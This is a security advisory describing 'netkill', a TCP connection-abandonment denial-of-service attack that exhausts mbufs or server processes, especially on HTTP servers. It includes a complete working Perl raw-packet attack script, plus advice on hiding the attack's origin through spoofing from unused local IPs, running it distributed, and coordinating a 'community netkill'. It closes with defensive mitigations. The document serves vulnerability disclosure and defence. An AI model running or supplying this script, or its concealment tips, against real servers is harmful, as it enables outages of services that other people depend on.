COMMAND

    TCP/IP

SYSTEMS AFFECTED

    Any system that runs a TCP service that sends out data

PROBLEM

    Stanislav  Shalunov  posted  following.   By  exploiting  features
    inherent to TCP  protocol remote attackers  can perform denial  of
    service attacks on a wide array of target operating systems.   The
    attack is most efficient against  HTTP servers.  A Perl  script is
    enclosed to demonstrate the  problem.  The problem  probably isn't
    "new";  many  people  have  thought  about  it before, even though
    Stanislav  could  not  find  references  on  public newsgroups and
    mailing lists.  It's severe and should be fixed.

    When TCPs communicate, each  TCP allocates some resources  to each
    connection.  By repeatedly establishing a TCP connection and  then
    abandoning it, a malicious  host can tie up  significant resources
    on a  server.   A Unix  server may  dedicate some  number of mbufs
    (kernel data structures used to hold network-traffic-related data)
    or even a process to each  of those connections.  It'll take  time
    before the connection times out and resources are returned to  the
    system.  If  there are many  outstanding abandoned connections  of
    such sort, the system may  crash, become unusable, or simply  stop
    serving  a  particular   port.   Web   servers  are   particularly
    vulnerable to this  attack because of  the nature of  the protocol
    (short request  generates an  arbitrarily long  response).  Remote
    users  can  make  service  (such  as  HTTP) unavailable.  For many
    operating systems, the servers  can be crashed. (Which  interrupts
    service and also has a potential of damaging filesystems.)

    This could be made to  work against various services.   We'll only
    discuss how  it could  be used  against HTTP  servers.  The attack
    may or may not render the  rest of the services (if any)  provided
    by the machine unusable.

    The mechanism  is quite  simple: After  instructing our  kernel to
    not answer any packets from  the target machine (most easily  done
    by  firewalling  that  box:  with  ipfw,  "deny any from TARGET to
    any") we repeatedly initiate a  new connection from a random  port
    by sending a  SYN packet, expecting  a SYN+ACK response,  and then
    sending our  request (we  could more  traditionally first  confirm
    SYN+ACK and  only then  send the  request, but  the way  we do  it
    saves packets).

    It  is  felt  that  attack  is  more efficient when static file is
    fetched this way rather than dynamic content.  Nature of the  file
    doesn't matter  (graphics, text  or plain  HTML will  do fine) but
    size is of great importance.   What happens on the server when  it
    receives  these  spurious  requests?  First  of  all,  the  kernel
    handles the TCP handshake; then, as we send our second packet  and
    handshake is thus completed, a user application is notified  about
    the  request  (accept  system  call  returns,  connection  is  now
    ESTABLISHED).   At  that  time,  kernel  has  the  request data in
    receiving queue.  The process reads the request (which is HTTP/1.0
    without any keep- alive  options), interprets it, and  then writes
    some data into the file descriptor and closes it (connection  goes
    into FIN_WAIT_1 state).  Life then goes on with some mbufs  eaten,
    if we reach this point.

    This attack  comes in  two flavors:  mbufs exhaustion  and process
    saturation.

    When doing mbufs exhaustion,  one wants the user-level  process on
    the other  end to  write the  data without  blocking and close the
    descriptor.  Kernel will have to  deal with all the data, and  the
    user-level process will be free, so that we can send more requests
    this way  and eventually  consume all  the mbufs  or all  physical
    memory, if mbufs are allocated dynamically.

    When doing  process saturation,  one wants  user-level process  to
    block while trying to write  data.  The architecture of  many HTTP
    servers will  allow serving  only so  many connections  at a time.
    When we  reach this  number of  connections the  server will  stop
    responding  to  legitimate  users.   If  the  server doesn't put a
    bound  on  the  number  of  connections,  we're  still  tying   up
    resources and eventually the machine comes to a crawling halt.

    Mbufs  exhaustion  usually  has  no  visible  effect  (other  than
    thousands of  connections in  FIN_WAIT_1 state)  until we  reach a
    hard limit  of the  number of  mbufs or  mbuf clusters.   At  that
    point,  the  machine  panics,  dumps  kernel core, reboots, checks
    filesystems,  recovers  core  dump--all time-consuming operations.
    (This is  what happens,  say, with  FreeBSD and  other BSD-derived
    systems;  it  worked  for  me  against a machine with maxusers=256
    and 512MB  of RAM.)  Some other  systems, such  as Linux,  seem to
    happily allocate  arbitrary amount  of memory  for mbuf  clusters.
    This memory cannot  be paged out.   Once we start  approaching the
    physical  memory  size,  machine  becomes  completely unusable and
    stays so.

    Process  saturation  usually  exhibits  itself  in  server   being
    extremely  slow  when  accepting  new  connections. On the machine
    itself there's a  large number of  ESTABLISHED connections, and  a
    large number of processes/threads visible.

    Once the process  saturation attack reaches  success and while  it
    lasts, clients trying  to connect to  the server usually  all time
    out.  But if they manage  to establish a connection (this is  only
    tested with Apache) the  server may not send  any data for a  long
    time.

    Due to lack  of consenting targets  and time I  have not done  any
    attacks  over  modem  dial-up  links.  So  this  section is mostly
    speculation.   Let T  be the  average time  that the target system
    retains a connection of given kind, R be the average time  between
    two "hits" by one attacking  system, N be the number  of attacking
    systems, and A  be the number  of packets the  victim sends before
    resetting connection  when peer  is unresponsive.   Then, after  T
    seconds since the  beginning of the  attack, the victim  will have
    N*T/R hung connections.  That number won't change much afterwards.

    A  "typical"  BSD  system  with  maxusers=64  would have 1536 mbuf
    clusters.   It looks  like T  is around  500s.   So, if we can get
    R=.3s (easily done if we have  a good connection) we can crash  it
    from a single client.   For dial-up, a more  realistic value of  R
    would be  around 2s  (adjusted for  redials).   So, six  or so co-
    operating  dial-up  attackers  are  required  to crash the target.
    (In real  life we  might need  more attackers;  guess is  that ten
    should be enough.)

    Linux doesn't  have a  limit on  the number  of mbuf clusters, and
    it keeps connections hanging  around longer (T=1400s).   In tests,
    Stanislav was  able to  let it  accept 48K  of data  into the send
    queue and  let the  process move  on.   This means  that a  single
    dial-up attacker can lock  about 33MB in non-paged  kernel memory.
    Four dial-up attackers seem to be able to destroy a 128MB machine.
    A single well-connected  client can do  the same, for  even bigger
    machines.

    Process saturation is even  easier.  Assuming (optimistically  for
    the  victim)  T=500,  R=2s,  a  single  dial-up  user  can tie 250
    instances of  the HTTP  server.   For most  configurations, that's
    the end of the service.

    TCP  is  a  complicated   business.   Parameters  and  timing   is
    everything.  Tweaking the window  size and the delays makes  a lot
    of difference.  Parallel threads of execution increase  efficiency
    in some settings.   Stanislav did not  included code for  that, so
    one will  have to  start several  copies of  netkill.  For maximum
    efficiency, don't mix  the types of  attack.  Starting  netkill on
    several machines has  a lot of  impact.  Increasing  the number of
    BPF devices on a BSD system may be necessary.

    Netkill does consume  bandwidth, even though  it's not a  flooding
    tool.  Ironically, most of  the traffic is produced by  the victim
    systems, and the  traffic is directed  to attack systems.   If the
    attacking  systems  have  T1  or  greater connectivity, this is of
    little consequence.   However, if  netkill is  used from  a  modem
    dial-up connection it'll be  necessary for the attacker  to redial
    often to get a new IP number.  Cable modems seem to be  unsuitable
    for launching  this attack:  bandwidth is  not sufficient,  and IP
    number cannot be changed.

    One might want to conceal the  origin of the attack.  Since  a TCP
    connection is established, we must  either be able to see  SYN+ACK
    or to guess the remote initial  sequence number.  It is felt  that
    full-blown  IP  spoofing  with  predicting  sequence numbers would
    make  this  attack  inefficient,  even  if  ISNs  are not properly
    randomized by the remote  end.  What one  might do is to  send the
    queries from an unused  IP on the same  network.  This would  have
    the added  benefit that  it would  become unnecessary  to firewall
    the target.  If the network administrator is not very skilled,  it
    might take significant  time for the  true source of  attack to be
    discovered.  One could further fake link-layer source address  (if
    the  OS  would  allow  that)  and  make  the source even harder to
    discover.

    We've seen a  number of distributed  attack tools in  the last few
    months become publicly  available.  They  mostly simply flood  the
    network with UDP  packets and all  kinds of garbage.   This attack
    is different  from those:  Rather than  saturating the  link, this
    attack saturates some resources on  the target machines.  If  used
    in combination with  a controlling daemon  from a large  number of
    hosts,  this  attack   will  have  very   devastating  effect   on
    Web-serving infrastructure.   Much more  devastating than  trin00,
    TFN, or Stacheldraht.  (When  used in a distributed setting,  Perl
    with a  non-standard module  may not  be the  executable format of
    choice.   The  Perl  script  would  probably  be  compiled  into a
    statically linked  native machine  format executable  using the  O
    module.   This  will  also  require  building  a  .a  format RawIP
    library.)

    An  interesting  application  of   netkill  would  be   "Community
    netkill":  a  large  number  of  people  (say, readers of the same
    newsgroups  or  of  the  same  website)  could  coordinate   their
    resources and start using netkill  on a pre-specified target in  a
    pre-specified time interval.  Since each person would send only  a
    few packets,  it would  be hard  to accuse  them of doing anything
    evil ("I just opened this page, and then my modem  disconnected"),
    but this attack can pretty much destroy anything.

    The effects  on a  load-balancing farm  of servers  will depend on
    how  the  load  balancing  is  organized.  For load-balancers that
    simply forward  packets for  each connection  to a  chosen server,
    the attacker is given the opportunity to destroy all the  machines
    that  the  load  balancer  serves.   So,  it  doesn't  offer   any
    protection.   The  load-balancer  itself  will  most likely remain
    unaffected. If the  "sticky bit" is  set on the  load balancer, an
    attacker operating from a single IP will only be able to affect  a
    single system at a time.

    For load-balancers that establish  connections and pump data  back
    and   forth   (this   includes   reverse   proxies),  the  servers
    themselves  are  protected  and  the  target  of the attack is the
    load-balancer itself. It's probably  more resilient to the  attack
    than  a  regular  host,  but  with  a  distributed  attack  it can
    certainly  be  taken  down.    Then  the  whole  service   becomes
    unavailable at once.

    Round-robin DNS  load-balancing schemes  are not  really different
    from just individual servers.

    Redirect load-balancing is  probably most vulnerable,  because the
    redirect  box  is  the  single  point  of  failure, and it's not a
    specialized  piece  of  hardware,  like  a  reverse  proxy.   (The
    redirector  can  be  a  farm  of machines load-balanced in another
    way;  still  this  setup  is  more  vulnerable  than,  say,  load-
    balancing all available servers using a Cisco Local Director.)

    The program below takes a number of arguments.  To prevent  script
    kiddies  from  destroying  too  much  of  the Web, author made the
    default values  not-so-efficient (but  enough to  demonstrate that
    the problem exists).   You'll have to  understand how it  works to
    make the best  use out of  it, if you  decide to further  research
    the problem.  With the default  values, it at least won't crash  a
    large server over a dial-up connection.

    use strict;
    use Net::RawIP ':pcap';		# Available from CPAN.
    use Socket;
    use Getopt::Std;

    # Process command line arguments.
    my %options;
    getopts('zvp:t:r:u:w:i:d:', \%options) or usage();
    my $zero_window = $options{z};		# Close window in second packet?
    my $verbose = $options{v};		# Print progress indicators?
    my $d_port = $options{p} || 80;		# Destination port.
    my $timeout = $options{t} || 1;		# Timeout for pcap.
    my $fake_rtt = $options{r} || 0.05;	# Max sleep between SYN and data.
    my $url = $options{u} || '/';		# URL to request.
    my $window = $options{w} || 16384;	# Window size.
    my $interval = $options{i} || 0.5;	# Sleep time between `connections.'
    my $numpackets = $options{d} || -1;	# Number of tries (-1 == infty).
    my $d_name = shift or usage();		# Target host name.
    shift and usage();			# Complain if other args present.

    # This is what we send to the remote host.
    # XXX: Must fit into one packet.
    my $data = "GET $url HTTP/1.0\015\012\015\012";	# Two network EOLs in the end.

    my ($d_canon, $d_ip) = (gethostbyname($d_name))[0,4]	# Resolve $d_name once.
      or die "$d_name: Unknown host\n";
    my $d_ip_str = inet_ntoa($d_ip);	# Filter wants string representation.
    my $dev = rdev($d_name) or die "$d_name: Cannot find outgoing interface\n";
    my $s_ip_str = ${ifaddrlist()}{$dev} or die "$dev: Cannot find IP\n";

    $| = 1 if $verbose;
    print <<EOF if $verbose;
    Sending to destination $d_canon [$d_ip_str].
    Each dot indicates 10 semi-connections (actually, SYN+ACK packets).
    EOF

    my $hitcount;	# Used for progress indicator if $verbose is set.

    while ($numpackets--) {
      # Unfortunately, there's pcapinit, but there's no way to give
      # resources back to the kernel (close the bpf device or whatever).
      # So, we fork a child for each pcapinit allocation and let him exit.
      my $pid = fork();
      sleep 1, next if $pid == -1;	# fork() failed; sleep and retry.
      for (1..10) {rand}	# Need to advance it manually, only children use rand.
      if ($pid) {
        # Parent.  Block until the child exits.
        waitpid($pid, 0);
        print '.' if $verbose && !$? && !(++$hitcount%10);
        select(undef, undef, undef, rand $interval);
      }
      else {
        # Child.
        my $s_port = 1025 + int rand 30000;	# Randon source port.
        my $my_seq = int rand 2147483648;	# Random sequence number.
        my $packet = new Net::RawIP({tcp => {}});
        my $filter =	# pcap filter to get SYN+ACK.
          "src $d_ip_str and tcp src port $d_port and tcp dst port $s_port";
        local $^W;	# Unfortunately, Net::RawIP is not -w - OK.
        my $pcap;
        # If we don't have enough resources locally, pcapinit will die/croak.
        # We want to catch the error, hence eval.
        eval q{$pcap = $packet->pcapinit($dev, $filter, 1500, $timeout)};
        $verbose? die "$@child died": exit 1 if $@;
        my $offset = linkoffset($pcap);	# Link header length (14 or whatever).
        $^W = 1;
        # Send the first packet: SYN.
        $packet->set({ip=>  {saddr=>$s_ip_str, daddr=>$d_ip_str, frag_off=>0,
			     tos=>0, id=>int rand 50000},
		      tcp=> {source=>$s_port, dest=>$d_port, syn=>1,
			     window=>$window, seq=>$my_seq}});
        $packet->send;
        my $temp;
        # Put their SYN+ACK (binary packed string) into $ipacket.
        my $ipacket = &next($pcap, $temp);
        exit 1 unless $ipacket;	# Timed out waiting for SYN+ACK.
        my $tcp = new Net::RawIP({tcp => {}});
        # Load $ipacket without link header into a readable data structure.
        $tcp->bset(substr($ipacket, $offset));
        $^W = 0;
        # All we want from their SYN+ACK is their sequence number.
        my ($his_seq) = $tcp->get({tcp=>['seq']});
        # It might increase the interval between retransmits with some
        # TCP implementations if we wait a little bit here.
        select(undef, undef, undef, rand $fake_rtt);
        # Send ACK for SYN+ACK and our data all in one packet.
        # The spec allows it, and it works.
        # Who told you about "three-way handshake"?
        $packet->set({ip=>  {saddr=>$s_ip_str, daddr=>$d_ip_str, frag_off=>0,
			     tos=>0, id=>int rand 50000},
		      tcp=> {source=>$s_port, dest=>$d_port, psh=>1, syn=>0,
			     ack=>1, window=>$zero_window? 0: $window,
			     ack_seq=>++$his_seq,
			     seq=>++$my_seq, data=>$data}});
        $packet->send;
        # At this point, if our second packet is not lost, the connection is
        # established.  They can try to send us as much data as they want now:
        # We're not listening anymore.
        # If our second packet is lost, they'll have a SYN_RCVD connection.
        # Hopefully, they can handle even a SYN flood.
        exit 0;
      }
    }

    exit(0);

    sub usage
    {
    die <<EOF;
    Usage: $0 [-vzw#r#d#i#t#p#] <host>
	    -v: Be verbose.  Recommended for interactive use.
	    -z: Close TCP window at the end of the conversation.
	    -p: Port HTTP daemon is running on (default: 80).
	    -t: Timeout for SYN+ACK to come (default: 1s, must be integer).
	    -r: Max fake rtt, sleep between S+A and data packets (defeault: 0.05s).
	    -u: URL to request (default: `/').
	    -w: Window size (default: 16384).  Can change the type of attack.
	    -i: Max sleep between `connections' (default: 0.5s).
	    -d: How many times to try to hit (default: infinity).

    See "perldoc netkill" for more information.
    EOF
    }

SOLUTION

    There can  be several  strategies as  for workarounds.   None give
    you a lot of protection. They can be combined.

        * Identify offending sources as they appear and block them  at
          your firewall.
        * Don't let strangers send TCP packets to your servers. Use  a
          hardware reverse proxy. Make sure the proxy can be  rebooted
          very fast.
        * Have a lot of  memory in your machines. Increase  the number
          of mbuf clusters to a very large number.
        * If you  have a router  or firewall that  can throttle per-IP
          incoming rates of certain packets, then something like  "one
          SYN per X seconds per IP" might limit the damage.  You could
          set X to 1 by default and raise it to 5 in case of an actual
          attack.  Image loading by browsers which don't do HTTP Keep-
          Alives will be very slow.
        * You  could fake  the RSTs.   Set up  a BSD  machine that can
          sniff all the HTTP traffic.  Kill (send RST with the correct
          sequence number)  any HTTP  connection such  that the client
          has not sent anything  in last X seconds.   You could set  X
          to 60  by default  and lower  it to  5 in  case of an actual
          attack.

    A combination of these might save your service.  The first method,
    while being most  labor- and time-consuming  is probably the  most
    efficient.  It  has the added  benefit that the  attackers will be
    forced to reveal  more and more  machines that they  control.  You
    can later go to their administrators and let them know.  The  last
    two methods might  do you more  harm than good,  especially if you
    misconfigure  something.  But  the  last  method  is also the most
    efficient.

    We're  dealing  here  with  features  inherent  to TCP.  It can be
    fixed, but the price to pay is making TCP less reliable.  However,
    when the machine crashes, TCP becomes very unreliable, to say  the
    least.  Let's  address mbufs exhaustion  first.  When  the machine
    crashes, is there anything better  to do?  Obviously.   Instead of
    calling panic(), the kernel might randomly free some 25% of  mbufs
    chains, giving some random preference to ESTABLISHED  connections.
    All the  applications using  sockets associated  with these  mbufs
    would be  notified with  a failed  system call  (ENOBUFS).   Sure,
    that's not very pleasant.  But is a crash better?

    Systems that  do not  currently impose  a limit  on the  number of
    mbufs  (e.g.,  Linux)  should  do  so  and use the above technique
    when the  limit is  reached.   An alternative  opinion is that the
    kernel should stop accepting new connections when there's no  more
    memory for TCBs available.  While this addresses the problem of OS
    crashes (which is an undeniable  bug), it doesn't address the  DoS
    aspect:   the attacker  denies service  to most  users by spending
    only a small amount of resources (mostly bandwidth).

    Process  saturation  is  an  application  problem, really, and can
    only be solved  on application level.   Perhaps, Apache should  be
    taught to put a timeout  on network writes.  Perhaps,  the default
    limit  on  the  number  of  children  should be very significantly
    raised.   Perhaps,  Apache  could  drop  connections that have not
    done anything in the last 2*2MSL.